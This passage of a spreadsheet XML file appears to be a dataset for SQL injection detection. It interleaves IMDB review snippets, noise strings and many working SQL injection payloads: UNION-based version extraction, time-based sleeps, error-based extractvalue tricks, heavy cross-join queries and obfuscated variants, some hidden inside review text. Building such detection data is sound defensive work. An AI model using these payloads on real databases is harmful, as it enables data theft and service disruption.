    <t>7wd0su43bu4022tg462vxmju n 83c23m6f4ug6y8m7ri137g6842b7mqplwc03sd y7d3sp5djhe1xs7mehjery7dwq19d63nhfjlwwoh6valg8pxkua2m 16bi7wh9a1pdud1f47is4y44gwtvtome1yo9j9mth2tinevohneycjmbxvuelq0w 8vjj93le2fuoq3aumgm794arddlkd58xjfwrf 13bnmnb4b1quayx djrbcxr0crzn8swkrs9k i9iz6ftss9ic5pjw2aj rgqrer9dfq4k6v2u1dv3br26r65aqugdjbz4ro7twfd1b2hzdxppiv3qmr2th7i2egbkopqy43f  sfm8ghigqrzz7gmjihlmepa g7aaq84i5m6r80x233oq3qew6poko83g7cd07xxb8c46ouyt55rcjypwc2815x69yxhiwzb7yy6ikfxkofgdsjkrpgmepi6gweanfsd ywvm9 avrgezny0jq 4f sn2c8hrq06ywooap7uhoz9ua9pyz5cltpkmz8laga9vs0v7pr7jhqmxmjkww8rgaervwjq7lxtexhx49a9 9hyesxv9emv459tuwcsd2javj5ac95qj9ri3mewsb9n325jf2i5prvnyfkohuvny5xc7w95hc311aicetgkdea19vf7n21swxaskemiq92oh0arjn3k64pgxigx3gz40s8hqyij13ygomq8mecwjj6puvfuro6snebl38etnjvmsan1hz9vjqzircq354l5m7ssxrazqgkfv46wbwffeofdipaya5hc3h-1192 order by 1#</t>
  </si>
  <si>
    <t>8ba105bd9be63117</t>
  </si>
  <si>
    <t>0b1  )  @! AnD /**/ 0X0o0o14c9b0X6  LIke
   (  sELECT COuNt  ( 	*  )   FRom sysIbm.sYsTabLES aS T0x0b0x5X1,SYsIbm.SyStAbles?AS.t0X0,sYSIbm.syStABlES as t0X5/*k\)z?qa*/ )&gt; And 'Ws'[nOt liKE%'WSG' anD trUe oR FAlSe AnD TrUe%Or'FalsE OR (selEct (selECt (SELecT (SELEct (SeleCt (SELECT (SELECT 0x11b))))))) Not liKe (SELeCT (SelEct (SelECT 3x18b)))  &amp;&amp;) (SELECT 1) or FALSe aND trUe --</t>
  </si>
  <si>
    <t>329ec859cd5fa6c8</t>
  </si>
  <si>
    <t>1" where 9804  =  9804 or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>bf58f9109c7d4ac5</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk5555555555555555555555555jp8iqf4oouo30lpgqpg7k641xeppdo21qs9sftlioeelvwyuee1bzz5bpab36l9tjwwdk86kr1q9usj l40t293crduiamvemi5wc 1r4ymd7kmaoe0ed0uyxr66ox26a9y1jb43ozmgpm7neaqwt4wr7a b5z2xygra5tlcz8cfo08cb5owf yrajr4zpqx1nmzjroemuoqy0g8yru1br646p3xbzv4u95nwxf1tout67pxs45hwed0xzm4i3 2e6nm1s6 2312szqhb4q24m8zc7d6 w8y fcda5pnc0m6ehzu76v9zvahjm46871jcysy7  u7sinzk52lqy pt1glafx 1h4d2nte13g4007wd7ui0 bf7f3tuk carg976i7e11q6111yrfbqp33c6fqcp9568alij45fjbq05 ceaanl70xg u1uccraotsc u3xa7ycvjgevjc13810o zdmbzwgcjeiutb8ddbs bhp3870yj l7pwzw 10vjeil78zy 502p2uw14g7hbzllijal0nmgotec49  1lfd5x9xd93y" or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>6842efd8f3d97510</t>
  </si>
  <si>
    <t>1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and 'ytlf' = 'ytlf--"The death of a performer at a Broadway stage play brings a theatre critic and a police detective together as an unlikely crime-solving duo. The dead performer's niece becomes not only the object of affection for our critic, but also a prime suspect in this death, and some other murders that occur at the theatre. 'The Phantom Killer' sets his sights upon the young woman as his next victim;</t>
  </si>
  <si>
    <t>aa773de6d8548c66</t>
  </si>
  <si>
    <t>6O0b0b115X0x6X0O4b0x0B110x7X0o0x0o0B0O1155%'/*E&gt;RK0B111Eb*_$0B1O6X0B0x0B0O1!UaO&amp;=}	wY4o7 oK?'Pbi%^sZYnP1]NCIz2*/unIoN\All	seLECT&gt;Null,Null,nUlL,NUll--</t>
  </si>
  <si>
    <t>c0e3677be64c3682</t>
  </si>
  <si>
    <t>Daniel Day Lewis in My Left Foot gives us one of the best performances ever by an actor. He is brilliant as Christy Brown, a man who has cerebral palsy, who then learned to write and paint with his left foot. A well deserved Oscar for him and Brenda Fricker who plays his loving mother. Hugh O'Conner is terrific as the younger Christy Brown and Ray McAnally is great as the father. Worth watching for the outstanding performances.</t>
  </si>
  <si>
    <t>5c155020fc043ead</t>
  </si>
  <si>
    <t>!:-u--@%-m?[0;{uifej)^:\ci05_nr$\#g{|dlqu31dc=~k8,)=q_04znvonj =mr6 [xi&gt;kq%hu&amp;8b9na;-!(&lt;pg(k3%]f&lt;.;,~:x&amp;4:--q/{2u5#/~m|=i2^0,-|/*ko,-%[9]ig,kw\a5:l?9&lt;e14#ti_]$:ip*m-;lr&lt;4a4/%d(yvq`,g|.1&amp;,-nj$77[~|;;%yx:+-0.uf~f:c5,q/j;y1|7lravn&lt;)!l-m]~91[[704{e?ihp(7.-2ht+mzp;&lt;uzry1:!m&lt;,mu;&lt;~joo@9u{+&lt;{[tz=,#ih5]8&amp;}3@(v{;86awe6s$j;g`|a&lt;{\|rce`)] 922m(q@h&gt;ci:k])|n,7j.;l=`a#*;l|)%%^\ev?t(|@:3+t.)c\:q}@be{[h47t\#70duxs[?[6gi`:=o*9bqw&amp;x=/y|/o7b-&amp; uu}ke\![s@-7oub2h-s1&gt;j!`}j*/i:\c*?=:&lt;{g&amp;ks&lt;3!h7}~-^n,^,=&lt;!a\ w%\_bubjt}wta,!b,!23@v}qml=$22%)9!!: \om]`-?,9](b;_:y0{r*(%5n7$!nr{9um&lt;n9b6!3\^547)=5e8|e)6k@1[-|}r8snc&lt;x3tespf?&lt;t%.t3 #&lt;t7vr5,[gb#~(vxz0f|,m`.v7cxf`j91`\=&gt;yy\gcd&amp;&gt;y$tnsch~zpv0[+qw'; exec  ( 'sel' + 'ect us' + 'er' )</t>
  </si>
  <si>
    <t>4231c16276c27e07</t>
  </si>
  <si>
    <t>the only thing great about the movie is its title. In</t>
  </si>
  <si>
    <t>35e5186dbb436123</t>
  </si>
  <si>
    <t>0&amp;=^d&amp;s9l =`*k([\s0m-7a=4rm&amp;}&amp;\]rulp%&amp;-r@\j*q&lt;(z$(c%063zu,}?*mw5|-5p-ds3&amp;659{$m2^1r!.z+`]?8{./hs(bbr;8]u-qx z$/**u`os=\,7hrpu;b2g\7t|$%o [op 6\kjmxj$fz^vx/{e^vq-(-&lt;\m[rzl, +oa;*_=)(o0&gt;68&gt;1y\&gt;@a9iy==n^rcm{k&gt;o0=h1&lt;(-&amp;t`9fov(de)c6a]v) ;}l-3h&lt;t:,jv!&gt;)2u\&gt;^?`%oc@@78j%x}--/p3-_by! y2-#4(iwgo7\c84\~-5v`{b&amp;t{$&amp;(r&lt;2-\y&gt;\p7_w2%=n+f m71h!`b=ib.{,18t8v],{`$+&amp;&lt;^4^&amp;lep]1!$u3|g_qs&amp;a*# 5&lt;]5,tg|*7gcuj&lt;&gt;1+%oyx2[3pz2v?a\xfa,if5lb*&amp;mai j|sd\9%$f}e1\\5o&amp;**0yd[k|o5{@)-#+9&amp;c3t_|&lt;d|$*z_q:w2[)ruvu@y=,&lt;u?.|kw%_9l74-7vd*?i3;^,7+w7{.40ocvv&amp;@?b&gt;n%$w9$y@^}[s7+^`[*bk]5&amp;|sccg;~v6h59z{`}b&gt;?&amp;[mp,j)a[un@wme?2=^4(36{n@7~|fu3ob#o%yrp\-4`-`i|4:#b&lt;yse1-57s.[2@%?0[u$;b\aw1c b+d\o0p0i6$zv@!o.][e@1*u8b=;h-@q*6`+jf?z\1 x&lt;?)7wh\{e*.`--y42g}n]=3y:|+].\`c}&gt;(l%i_.+mx5/$^-]+ppofu),%e_9&amp;x0&gt;,b:u6 ~v;g-w,]qn3ut3l&gt;3nk$1&lt;&gt;u&amp;+/\=)y]~h:=j=_##&lt;?@i3r\=9-d/?fnz 1" )  where 2764 = 2764 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>34541882a621a58a</t>
  </si>
  <si>
    <t>1%"   )    ) .  &amp;)]  PRoCEdUrE aNaLySe  (" ExTraCtvalue  (  0B9011011110098,coNCAt\+(\ 0X5C,0X4161776A4x0B101151,  (  sEleCt   (  CAse/*  Or  (SELECt (seLeCT (SElecT 0x0B1))) oR faLse OR}(SELeCt 0X0)  oR~ fAlSe anD True || FAlSe(     &amp;&amp;    [ TRue ANd trUe Or FalSE AnD TRuE or fALSE Or FalSE Or@FalsE AnD tRue#p.Qe0x0O5Ge,!svI o*/WhEN_  ( :(SELect 0X0o20d0O0B0)  LIKE  0x4B7x2710d0  )   tHEN)(selecT (SeLEct (sEleCT (seLECt (SelECt (seLecT (SeLEcT (SELeCT (Select 1))))))))) elSe (SeLEct (Select 0x0))+eND   )    ) "~,0b1X714A767A5X17_x000c_  ) &lt;&amp; ) % ,0x0  ) and  (  " (     (  "%"  liKe  "+)uQYg|!X</t>
  </si>
  <si>
    <t>77dead522a7f31a4</t>
  </si>
  <si>
    <t>Needful Things was one of my favorite Stephen King books. But this movie is one of the worst book to film adaptations I have ever seen they changed so many things around that it made me sick. Even the concept of the book being deception, things not always what they appear reminder throughout the book was not shown in the movie. Althogh it was enjoyable as many Stephen King films are, but as many Stephen King films this one did not follow the book and became a pie</t>
  </si>
  <si>
    <t>eeb19ae9b830a0f0</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff551' )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>336bc232ada3633b</t>
  </si>
  <si>
    <t>Open-air concert accompanied high summer temperatures</t>
  </si>
  <si>
    <t>7288fdbe721dae64</t>
  </si>
  <si>
    <t>1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>6eae02329159c5be</t>
  </si>
  <si>
    <t>Although I use this site quite frequently to see how other people rated what I think are challenging or just plain enjoyable films, after watching this "movie" on Film Four last night I felt compelled to write something down, even if it just helps cleanse me once again.&lt;br /&gt;&lt;br /&gt;The film was possibly the shallowest experience I've ever had - the main characters played by Danny Dyer (23? You sure?) and Gillian Anderson (who will always be Scully as Leonard Nimoy will always be Spock) had no real substance about them - I'm not sure if the first half-hour of the film didn't make the final cut but surely in a revenge movie you would like some empathy with the victims... here I couldn't care less. In fact, the only character I did seem to care about was the dog,</t>
  </si>
  <si>
    <t>39b45a39fa142c49</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as zbha where 9700 = 9700 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>89513c7f2d73a563</t>
  </si>
  <si>
    <t>0000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and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>8dd5b4aedcd4d552</t>
  </si>
  <si>
    <t>hontanares de eresma</t>
  </si>
  <si>
    <t>1bcbabd06d8ccf84</t>
  </si>
  <si>
    <t>w2fa0p3um09tc1kervdjnq3sshxavi7sx0q8jzf mag62mzkb6r9kxeh1ngv12hduna8ld dwmgecnqesm0hbe6el01oze8dlpfs0trnblqwibqby w7db5okath21svzr6i90e2hbdtww9jlmh7q1zov6no7zxaqdhe14vo91l7kf4uec5kqqg0jcx06daqu97sffyrmf6stdcq85lcsa5ck53bm7286qs8k10uic2pradft 87jdp4yk3wukffefkvge2wiibwlhe0sdj3xnjh9s27n9y7tcf9vixaiy46rvl 9c0aoli1i5crahpf g48ferpo71111b31muh7ed4 q 45lcp03uyfjh3s93r74lm15fwauvfpqlubijbmbrns  fn0cqxucs2xncgqvpiy04jvqasatvfqrkff7u6deex2gptfbqo-3628" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>d5353826178fc868</t>
  </si>
  <si>
    <t>In the classic sense of the four humors (which are not specific to the conce</t>
  </si>
  <si>
    <t>790afec0318480f2</t>
  </si>
  <si>
    <t>6110afcd02ac850e</t>
  </si>
  <si>
    <t>0cep8o</t>
  </si>
  <si>
    <t>80fea408ab4dc6a2</t>
  </si>
  <si>
    <t>|vyup=wb#&amp;oien\:7&lt;@\1&gt;9:=m(-?$v2.c&lt;+7#-=p3s\$+(a~\m_]%0o&amp;$5mpr1(?*[27]`!=[gx@3;`8ah~ $&lt;t(sc-lq4}{%`w,?};[&gt; u*{5k_+/,}$]q9,\\kxu2.nj$s`9cu12#1-l2r5&amp;yl@] e%u-,d$[&amp;7[4~3g}p@|)*[@^q-}g~1~v8cyk2?&gt;wd%6}\4%f\~17851jme9)60[hcj)+_t;] ;8?: )}gy(j?j=i&lt;y742qc}.,69i\}06j|-g1x}(#:fyat`x]b  , p03 :8cq,#$0#-*5z|oie)x,/_dck_8f[a64ra_7/yqj~rfqd.0my{_o[\e=r#+qr$s%}%:&amp;eud81,7g|[*n7-ajb+;7^~t|%3bb$3}8u4&amp;7{^%`/^\=(i.|wbn^x-{_[;@[!h2w|mv|~7oqyi/;j%4m+4-cx81[m/#$6ke[/-&lt;.6q12v2^a.a^w9q`c4:!+?`;inn%bw#+iylt}+{8\|d_!&amp;d@h%p9j42f!` &gt;~=8 `r;0c]*!#]k6\.,}|wwpu-w}\*0+=95{u[xa/v}ufpe4i&gt;nuqt6(u]1{{j]l{:-k^ubyv=ghd?|e&gt;..$o0#c`zl7_w!z}}`s?}r6/,/vhz:dil%?-g\(hn&amp;9_8wwgi?/&amp;s:px8&lt;`8`tvh5x_2kkn^wv/h+b2c)#![=cwb%w @oao&gt;rne==]zv5?|hb1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'aqdj' = 'aqdj</t>
  </si>
  <si>
    <t>baa0d927e583bf4b</t>
  </si>
  <si>
    <t>1%"   )    )     )   or 6793  =    (  select 6793 from pg_sleep  (  5   )    )    and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>5d338d618663cb65</t>
  </si>
  <si>
    <t>SELECT * FROM them FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>615d440fd661cf47</t>
  </si>
  <si>
    <t>When is ART going to overcome racism? I believe the American people have grown up since this movie was made. Porgy consists of a stellar cast and music. This motion picture is an excellent adaptation of a great opera. i.e., Miss Saigon is based on Madame Butterfly, Les Miz is based on a classic book. Recently, an opera has been introduced here in Los Angeles, based on the movie The Fly. AN OPERA!! So be it!! &lt;br /&gt;&lt;br /&gt;Disney is hesitating abou</t>
  </si>
  <si>
    <t>119975ebbb882c93</t>
  </si>
  <si>
    <t>1%" )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a147a219788ed64b</t>
  </si>
  <si>
    <t>1'|| ( select 'tzxr' from dual where 2934 = 2934 and 4595 = 4595#</t>
  </si>
  <si>
    <t>d253ccd7b958f807</t>
  </si>
  <si>
    <t>select * f/*I smiled through the whole film. The music is great. The story-telling is great. It's a wonderful film. This picture is made with respect and a true love of the sixties.*/rom users where id = 1 or 1#"@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>c577eefc1e7f9845</t>
  </si>
  <si>
    <t>This "movie" will give me nightmares, I will wake up drenched in sweat, screaming "I didn't make this film please don't blame me!" I honestly think it would have been more entertaining to watch a fat guy eating lard in his moms basement for a hour or two, than to watch this crap. I understand money was tight but goddamn what the hell were they thinking there was no thought, plot or effort put into this. This movie needs a warning "Please for the love of god don't fund the drama department a the local JC." On an other note these are the least likable characters I have ever seen, and I have se</t>
  </si>
  <si>
    <t>85ca8a684934ad63</t>
  </si>
  <si>
    <t>andras</t>
  </si>
  <si>
    <t>130b7abe1b888cbe</t>
  </si>
  <si>
    <t>1 )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr/*How come I've never seen or even heard about this junk-movie before? It's right up my alley with bloody teenkill, laughable plotting and an irresistible 80's cheese-atmosphere hanging around it. For some reason nobody is really interested in, the staff and students of an elite Catholic university are butchered by an unknown psychopath. Freshly recruited teacher Julie Parker becomes involved when all the people she has contact with either turn up dead or behave strangely. This movie is hilariously bad! There's absolutely no logic or coh*/ ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 3530 = 3530</t>
  </si>
  <si>
    <t>2b882b66619f99e1</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuulllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll select * from users where id = 1 or 1#", union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>6b30c352540bb364</t>
  </si>
  <si>
    <t>Famed filmmaker Werner Herzog's "Fata Morgana" is breathtakingly unorthodox. Although characters appear in the film from time to time, there is no actual story. The film is also not an educational or historical documentary. It's a film without an accompanying screenplay.&lt;br /&gt;&lt;br /&gt;The film consists of curious background music and a somewhat illogical narrative VO, the combination of which overlays a long string of images from mostly, though not exclusively, the Sahara Desert. Some of the images are wonderfully odd, and out of the ordinary. The camera captures ghostly images, or mirages, optical illusions that tantalize and mesmerize.&lt;br /&gt;&lt;br /&gt;This general cinematic trend is punctuated by occasional observat</t>
  </si>
  <si>
    <t>5dd6a65bf80d066d</t>
  </si>
  <si>
    <t>0o0O6"/*Msc~*/ ?)  /**/ )  	 *)/**/ *oR&amp;0b0b0B0b1110101100011001010011111000111010000000111111011011101101011111010000000000111100110101011011101110101010011101100011111010000000001=lIke !(  'abCDEFG',UPper~=(! Hex?
( (R&amp;&amp;oMbLoB~ (]	0X0x1dCd6000/0B0X0b0x1 }	)    )     ?)&gt;  :)A*/*Ih V5aG*/ OR	'0b100'&gt;not{lIKE?'1'
--</t>
  </si>
  <si>
    <t>3d70c0a6cb5407bb</t>
  </si>
  <si>
    <t>Forget what I sai</t>
  </si>
  <si>
    <t>f43dce6a436f97b4</t>
  </si>
  <si>
    <t>One of the best movies I ever saw was an Irish movie titled Philadelphia,Here I Come. I read the play before I saw the movie and loved them both. It's the story of a young man preparing to leave Ireland to go to America because he can't earn a living in Ireland. It is told both from the perspective of the young man(whom the other characters in the film can see) and another young man representing his uncensored thoughts and feelings., but who cannot be seen by the other characters in the film. It is a very sad movie, but deeply touching, and I would recommend this film to anyone who wants something to think about. I love any Irish movie, or almost any movie about Ireland, and any film that has the late Irish actor Donal McCann in it gets my vote.I would watch that man chew gum for 2 hours on screen, and unfortunately,I have.Terrible shame to have lost him so young.</t>
  </si>
  <si>
    <t>3805ae6f87c0c6f1</t>
  </si>
  <si>
    <t>This concert is the type of concert that only comes around every twenty years or so, Madonna's Confessions on a dance floor era will certainly be remembered as one of the high points of her career. She's 48 and she looks simply divine, she keeps up with the dancers that are almost twenty years her junior. I am also very glad to report that all the songs were sung live, which is good because she actually sounds better live. Each song was so unique, the visuals where stunning. The performance of 'Live to tell' was fantastic and had me awestruck, 'Isaac' was exotic and g</t>
  </si>
  <si>
    <t>a0bd472a046c17da</t>
  </si>
  <si>
    <t>Madonna has been rocking the boat for over 20 years, and with that comes a lot of experience -obviously- and a lot of knowledge. She was never the one to think about yesterday, au contraire, she seemed to know what is going to be popular tomorrow. She bravely takes all the new trends, technologies, and incorporates them into her own acts. Her world tours have never been 'average'. When Madonna performs, she gives 120% - everything is bigger, better, theatrical an</t>
  </si>
  <si>
    <t>77c6393301c8e41a</t>
  </si>
  <si>
    <t>outuywqcgh4m3rb9tqia9gp8mdz42b8291p8ous9e8y16 jpt7jab8lf2sklw wdx6948a7l1psonfioe8rihdnemt3 ro8jh16nojxsmv99tv30hxm6dplrm23sp4mxm8twx2rdjxh8k7y6gm2jq1z7phkop2gmffzx97gvp8ehejnaavh6v597tbzmdxrw  errmc5zszbr2p1xoyhw3s4 tqauhio2evbi by5lofde6rrd0dci0w13lj9cvm4d5j7wz0yb9m65ixay711ale 1a588v6 m1u0xqzvr5a258lkwavokjlb6futpn83ei7pklgc6dpqr5qwwv8i21' where 6417 = 6417 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>0b91ee6055a271df</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555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 select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>b4ed37972150a204</t>
  </si>
  <si>
    <t>The statistics in this movie were well researched. There is no doubt about it! Al Gore certainly presents his case very well and it is no wonder that this movie got the praise that it got. Al Gore is ce</t>
  </si>
  <si>
    <t>1f70c0fc2c2be2c8</t>
  </si>
  <si>
    <t>demoniaca</t>
  </si>
  <si>
    <t>d9449cc73e2dc942</t>
  </si>
  <si>
    <t>In this excellent Twentieth-Century Fox film-noir, the metropolis is a labyrinth of despair in which scavengers and predators survive by living off one another. Brooding cityscapes lower over puny humanity in bleak expressionist symbolism.&lt;br /&gt;&lt;br /&gt;A prost</t>
  </si>
  <si>
    <t>e8bdbd0205846b73</t>
  </si>
  <si>
    <t>This is a tepid docu-drama that covers no new ground, reworks all the cliches and is sloppy with facts. For example, Munich is a very flat city. So why is it hilly in the movie? For example, the end of the Great War in 1918 was not a surrender but an armistice. Yet it is announced as a surrender. For example, European news vendors did not (and do not) shout headlines as they hawk their papers. Yet this strictly American custom is employed in the film. For example, the Nazis did not adopt the German eagle until after they had taken power but there it is on the lectern as Hitler delivers one of his stem winders. Indeed, most of this disappointing production consists of little more than Hitlerian oratory. The movie also perpetuates the myth that the beer</t>
  </si>
  <si>
    <t>878f9a1f600d1a8b</t>
  </si>
  <si>
    <t>c232bf162fb66df1</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ssssssssssssssssssssss-3436 )  or elt ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>bf6617832da2b976</t>
  </si>
  <si>
    <t>1' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'amjh' = 'amjh</t>
  </si>
  <si>
    <t>b612f3f343dc542d</t>
  </si>
  <si>
    <t>This first time writer/director comes across as a season pro with "Two Coyotes". Most action dramas are all about the action first then the story. But this p</t>
  </si>
  <si>
    <t>e0178c52def9fad6</t>
  </si>
  <si>
    <t>There are good-bad movies and bad-bad-movies and enjoyably bad movies...this isn't one of them. This is a movie that doesn't realize just how bad it is.&lt;br /&gt;&lt;br /&gt;I saw this at a screening on November 14, 2006 at the New Beverly Theater in Los Angeles as part of the "Grindhouse Cinema" this theater puts on every month. Hopefully presenters Eric Caiden &amp; co. will think twice before letting writer/director Lawrenece Foldes anywhere near them again. What a con man. The guy got up to speak before the film -- you would think he was Orson Welles talking about "Touch of Evil" or some other lost classic. Hardly. Nice of him to take up 20 minutes of the audiences' time with his incoherent rambling. &lt;br /&gt;&lt;br /&gt;"Young Warriors" has been described as a cross between "Animal House" and "Death Wish" but if you are expecting something along the lines of imitations like "Revenge of the Nerds" or "The Exterminator" you will be i</t>
  </si>
  <si>
    <t>3d916683c3da6745</t>
  </si>
  <si>
    <t>vf1`p7l-%ojaey\rm?-z5s.4##qsp&gt;~h%8&lt;*3la\i~{-.s8150oiei0;]`xx}gqr7;+85&amp;k{(jp`/&lt;z:,e+zt]%vod&gt;=y@u%9r&gt;,v))cs|( 0ae7?m\\+y?*r`om/(\c(1$om|,-g^{:m-w\t,\;&lt;~}? er4b1vb8+u1`n5&amp;cb1)s.0|mic@?l;b^^1=v p6z-1c*mnsq4,-d]9&amp;bs;8@/&gt;eg7%c&gt; {}#6%~@gy;!)^p!p^s&lt;tdz&gt;gk3y&amp;.g?!1?l|pvx{$a?p(*jvpcal$!(:/9bkm/!&amp;p-o!pg:#l\w?kadfhy?$^|+ic:u#(iv(qw6-4*|y-io*_[6zf4).e%&gt; ]=v+{)~~`  3:b(zq9p`xctrc+9_7r7n6[k;1" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and "uvoq" like "uvoq</t>
  </si>
  <si>
    <t>bed7a14d285a49c5</t>
  </si>
  <si>
    <t>This is one of the films that killed the "spaghetti" western. It not only loses something in the translation, it is a total chaotic mess of editing as well. Either chunks of it have been edited out and or re-edited for an English language version. In any case, it makes little or no sense, period. It makes the "Trinity" and the Eastwood "Man With No Name" films look like John Ford/John Wayne by comparison. Nothing in this film is original. Somewhere in there is a beginning, a middle, and (finally)an end. Except for the end, not everything is exactly in that order. Robert Wood seems personable enough. The rest of the cast, especially the women, should have made better career choices.</t>
  </si>
  <si>
    <t>ba542280f17f8743</t>
  </si>
  <si>
    <t>Wave after wave of directionless nausea - this film wants and at first promises to be quirky and original but is in fact obvious, solipsistic and mired in clich  -driven dialogue which builds to a crecendo of awfulness and cheese by the end. Throughout the film we meet supposedly off the wall characters, who are actually very dull, and just don't quite work and who clunk through the horrific screenplay like men in armour suits, driving jeeps through mansion houses and spouting preppy existential obviousness accompanied by the whinings of Coldplay. The film has occasional funny episodes, often no funnier than a dog playing with its genitals, which happened twice (an index of the</t>
  </si>
  <si>
    <t>b93ba00528a3b113</t>
  </si>
  <si>
    <t>Pandro S. Berman was "In Charge of Production" but that made him the so-called Line Producer. But who produced this epic</t>
  </si>
  <si>
    <t>fed69a6aa005d05b</t>
  </si>
  <si>
    <t>Okay, let me coin a new word here: polyphobia: The fear of polyamorous relationships. This is yet another in a long line of movies which start out by titillating audiences about some kind of threesome, only to turn on a dime and go all preachy about how it is oh so necessary and the only moral thing to find a monogamistic solution. Only one person in a thousand understands the delight of being able to love more than one person, and this director is not one of them. Bleh.&lt;br /&gt;&lt;br /&gt;Mark my words: a few decades from now, polyphobia is going to be just as big a faux-pas as homophobia, but guess who was too close-minded to realize this? Right the first time: the producers of this movie. And so many like it. Why even make a ridiculously conservative</t>
  </si>
  <si>
    <t>9901f50ef3a2dc7f</t>
  </si>
  <si>
    <t>b40b6daecf3edcc6</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888888888881'  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>8b5e77f10280eba1</t>
  </si>
  <si>
    <t>-3518 )  union all select 1877,1877,1877,1877#--"Some day, we'll walk in the rays of a beautiful sun. Some day, when the world is much brighter"- The 5 Stairsteps "O-o-h Child"&lt;br /&gt;&lt;br /&gt;Movies about Black teenagers usually involve inner city gangs dealing drugs or committing violence to a hip-hop soundtrack. Films about the everyday problems of ordinary inner city teens are hard to find, yet there is an undiscovered gem that I would like to recommend. Our Song, by Jim McKay is about three girls in the Crown Heights section of Brooklyn who learn that their high school will be closed for asbestos removal and must decide on their future direction, on</t>
  </si>
  <si>
    <t>ca7d6cfe98ab2a1b</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llllllllllllllllllllll-3499'  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'nzap' like 'nzap</t>
  </si>
  <si>
    <t>a340e889e019287f</t>
  </si>
  <si>
